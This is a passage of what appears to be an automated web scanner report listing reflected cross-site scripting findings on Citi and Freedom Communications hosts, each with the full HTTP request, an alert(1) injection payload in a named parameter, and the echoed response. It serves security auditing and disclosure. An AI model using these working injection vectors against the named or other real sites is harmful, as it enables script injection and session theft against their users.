GET /cbol/10/tiered_checking/default.htm?Promo_ID=CH62&CMP=KNC%2DMSN1%5FOLA87dce'%3balert(1)//cd49a21da3a&BT_SC=B%2EC%2EBJM%2Ej0%2EBbQ%2EX68%2EI9I%2EA%2EEKh&BT_TRF=27911&BT_MKWD=e%5Fdd6a510853e09300af83813511944be1&ef_id=zMRNSrCqAAABBiA%3A20110203134202%3As&ProspectID=6D86ACEB960B46F287AE0BAB34073BEC HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; AdData=S5C=1&S3C=1&S4=95408z285779&S4T=201102021659580798&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1&S5T=201102021659590042&S5=92846z285780&S4C=1; ATC1=25666dU8K6Rcc4ICcPKNLc2c27Kc2VLSc13Q8c5MGcR87ccccccccc; TVM402177C796C617E59544F41BEBEBEA9AC94938492FEF9FEEDEAC5C2DE6D8F5B3=T=1296740522949; CitiBTSES=SID=2100CDA941274771A8C1290EFDC21B8F; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F1=VTI3PTY=&VTIEML=0&VTITRF=27911&VTIPUB=2&TX=1296740523&VTIWAV=0&VTISEG=0&VTICAT=5840&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=402177C796C617E59544F41BEBEBEA9AC94938492FEF9FEEDEAC5C2DE6D8F5B3&VTIVEN=2292&SID=6D86ACEB960B46F287AE0BAB34073BEC&GUID=AC51251795744B1CB850CA9CB046EBD8; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Wed, 02 Feb 2011 13:43:10 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=2100CDA941274771A8C1290EFDC21B8F; path=/
Set-Cookie: CitiBT%5F1=GUID=AC51251795744B1CB850CA9CB046EBD8&SID=6D86ACEB960B46F287AE0BAB34073BEC&VTIVEN=2292&VTI=402177C796C617E59544F41BEBEBEA9AC94938492FEF9FEEDEAC5C2DE6D8F5B3&VTIAS=0&VTILNK=0&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTIPRC=0&VTICAT=5840&VTISEG=0&VTIWAV=0&TX=1296740523&VTIPUB=2&VTITRF=27911&VTIEML=0&VTI3PTY=; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Date: Thu, 03 Feb 2011 13:43:09 GMT
Connection: close
Content-Length: 14082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<script type='text/javascript' language='javascript'>
hbx.acct='DM550608DPBR';
hbx.pn='/KNC-MSN1_OLA87dce';alert(1)//cd49a21da3a';
hbx.mlc='/CBOL/Campaigns/LandingPage/BT_Popup';
</script>
...[SNIP]...

1.95. http://common.cdn.onset.freedom.com/tools/load.php [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 8d4ab<script>alert(1)</script>26bbc880e6b was submitted in the css parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site8d4ab<script>alert(1)</script>26bbc880e6b&scode=ocregister HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:46 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:46 GMT
ETag: "3e96ae5b9a43fcda3ef515d03304a9d6-80952"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 80952

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site8d4ab<script>alert(1)</script>26bbc880e6b&scode=ocregister */
@charset "utf-8";
/* CSS Document */

/* Reset styles for browser compatibility */
body, th, td, p, div {
   font-family:Arial, Helvetica, sans-serif;
}
html,ul,ol,li,h1,h2,h3
...[SNIP]...

1.96. http://common.cdn.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c071b<script>alert(1)</script>68b91996e9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c071b<script>alert(1)</script>68b91996e9f=1 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:50 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:50 GMT
ETag: "c833a993b4a7a934d84484ad93124520-86888"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 86888

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c071b<script>alert(1)</script>68b91996e9f=1 */
@charset "utf-8";
/* CSS Document */

/* Reset styles for browser compatibility */
body, th, td, p, div {
   font-family:Arial, Helvetica, sans-serif;
}
html,ul,ol,li,h1,h2,h3,h4,h5,h6,
pre
...[SNIP]...

1.97. http://common.cdn.onset.freedom.com/tools/load.php [scode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.cdn.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 8d317<script>alert(1)</script>6d5518f0373 was submitted in the scode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:47 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:49 GMT
ETag: "63029f1bf18ce33fe44a9bdae196c917-22441"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:47 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 22441

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 */
/*generic freedom site styles, take layout.css styles and define fonts, background images, etc */

/* define page areas */
body {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 100%;
...[SNIP]...

1.98. http://common.onset.freedom.com/fi/analytics/cms/ [ctype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1014d"%3balert(1)//21a83927387 was submitted in the ctype parameter. This input was echoed as 1014d";alert(1)//21a83927387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error1014d"%3balert(1)//21a83927387&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:44 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n19), ms iad-agg-n19 ( sfo-agg-n1), ms sfo-agg-n1 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:45 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28742

var fiChildSAccount="fiocregister";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
rn new
s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}


s.pageName="";
s.server="mortgage.freedomblogging.com";
s.channel="business";
s.pageType="";s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="error1014d";alert(1)//21a83927387";
s.prop5="blogs|mortgage";
s.prop6="";
s.prop7="";
s.prop8=""
s.prop9="";
s.prop10="";
s.prop11="";s.prop12="";
s.prop13="";
s.prop14=""
s.prop15="";s.prop16="";
s.prop17="";
s.prop18="";
s.prop19=""
...[SNIP]...

1.99. http://common.onset.freedom.com/fi/analytics/cms/ [domain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the domain request parameter is copied into a JavaScript inline comment. The payload d8ddc*/alert(1)//26af18f6098 was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:41 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n7), ms iad-agg-n7 ( sfo-agg-n28), ms sfo-agg-n28 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:41 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28807

var fiChildSAccount="fiocregister";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
4="10:50";
s.eVar6="";
s.hier1="business|realestate|blogs|mortgage|root";
s.hier2="mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098|blogs|mortgage|root";
/** domain=mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098 **/

/** referer=http://mortgage.ocregister.com/feeda71cd%22%3e%3cscript%3ealert(1)%3c/script%3e1f35e8c0ea2/ **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t()
...[SNIP]...

1.100. http://common.onset.freedom.com/fi/analytics/cms/ [domain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9298"%3balert(1)//3579af22c1e was submitted in the domain parameter. This input was echoed as e9298";alert(1)//3579af22c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.come9298"%3balert(1)//3579af22c1e&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:40 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n34), ms sfo-agg-n34 ( origin)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:40 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28807

var fiChildSAccount="fiocregister";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
<0){eval(c);return new
s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}


s.pageName="";
s.server="mortgage.freedomblogging.come9298";alert(1)//3579af22c1e";
s.channel="business";
s.pageType="errorPage";s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="error";
s.prop5="blogs|mortgage";
s.prop6="";
s.prop7="";
s.prop8=""
s.prop9="";
s.prop10="";
s.prop11="";s.
...[SNIP]...

1.101. http://common.onset.freedom.com/fi/analytics/cms/ [ghier parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://common.onset.freedom.com
Path:   /fi/analytics/cms/

Issue detail

The value of the ghier request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca8c"%3b4150865a2c4 was submitted in the ghier parameter. This input was echoed as aca8c";4150865a2c4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogsaca8c"%3b4150865a2c4 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:55:05 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n7), ms sfo-agg-n7 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:55:05 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28761

var fiChildSAccount="fiocregister";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
s.prop11="";s.prop12="";
s.prop13="";
s.prop14=""
s.prop15="";s.prop16="";
s.prop17="";
s.prop18="";
s.prop19="";
s.prop20="";s.prop21="";
s.prop22="";
s.prop23="foci";
s.prop24="foci";
s.prop25="blogsaca8c";4150865a2c4";
s.prop27=window.location.href;
s.prop28="fiocregister";
s.prop29="business|realestate|blogs|mortgage";
s.prop33="Onset";
s.prop34="";
s.prop42="free";
s.prop41="anonymous";
s.eVar11='Non-Registered'
...[SNIP]...

1.102. http://common.onset.freedom.com/tools/load.php [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 2441a<script>alert(1)</script>3c82a873a6e was submitted in the css parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site2441a<script>alert(1)</script>3c82a873a6e&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:29 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n6), ms iad-agg-n6 ( sfo-agg-n45), ms sfo-agg-n45 ( origin)
ETag: "f4f38c4aee23a73f09d77826215df995-80952"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:29 GMT
Age: 0
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:29 GMT
Connection: keep-alive
Content-Length: 80952

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site2441a<script>alert(1)</script>3c82a873a6e&scode=ocregister */
@charset "utf-8";
/* CSS Document */

/* Reset styles for browser compatibility */
body, th, td, p, div {
   font-family:Arial, Helvetica, sans-serif;
}
html,ul,ol,li,h1,h2,h3
...[SNIP]...

1.103. http://common.onset.freedom.com/tools/load.php [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload 56f76<script>alert(1)</script>f1eb6477288 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?js=56f76<script>alert(1)</script>f1eb6477288&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:25 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n40), ms sfo-agg-n40 ( origin)
ETag: "f9bfbcc84f8fc00f069b546540ef24b0-119"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:25 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:25 GMT
Connection: keep-alive
Content-Length: 119

/* http://common.cdn.onset.freedom.com/tools/load.php?js=56f76<script>alert(1)</script>f1eb6477288&scode=ocregister */

1.104. http://common.onset.freedom.com/tools/load.php [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload c4d58*/alert(1)//cadae76dd14 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:26 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n36), ms sfo-agg-n36 ( origin)
ETag: "921c1eecd508a1cdcf54fe736b0295a6-275310"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:26 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:26 GMT
Connection: keep-alive
Content-Length: 275310

/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister */
/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License

...[SNIP]...

1.105. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the CSS block comment that load.php writes at the top of a stylesheet response (Content-Type: text/css), not into an HTML document as the generic scanner wording suggests. The payload c442d<script>alert(1)</script>e464d1587a7 was submitted as a parameter name and was echoed unmodified. Inside a stylesheet the <script> tag is inert; it would execute only if a browser interpreted this response as HTML. The underlying defect is that load.php reflects its entire query string, including parameter names it does not recognise.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c442d<script>alert(1)</script>e464d1587a7=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:51 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n44), ms sfo-agg-n44 ( origin)
ETag: "9619eb07dd52d1bb379fc8198f8514d7-86888"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:52 GMT
Age: 3
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:55 GMT
Connection: keep-alive
Content-Length: 86888

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c442d<script>alert(1)</script>e464d1587a7=1 */
@charset "utf-8";
/* CSS Document */

/* Reset styles for browser compatibility */
body, th, td, p, div {
   font-family:Arial, Helvetica, sans-serif;
}
html,ul,ol,li,h1,h2,h3,h4,h5,h6,
pre
...[SNIP]...

1.106. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the JavaScript block comment at the top of the bundle. The payload e7e46*/alert(1)//5ca6254cbb1 was submitted as a parameter name and was echoed unmodified; the */ ends the comment and alert(1) is parsed as code. Since load.php reflects its whole query string, validating only the js and scode values would not close this hole. As with the other text/javascript responses from this host, the code runs in the origin of whichever page includes the URL as a script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:45 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n25), ms iad-agg-n25 ( sfo-agg-n22), ms sfo-agg-n22 ( origin>CONN)
ETag: "36d7fe9bef85681434af3bae951e1aa9-277034"
Cache-Control: max-age=86400
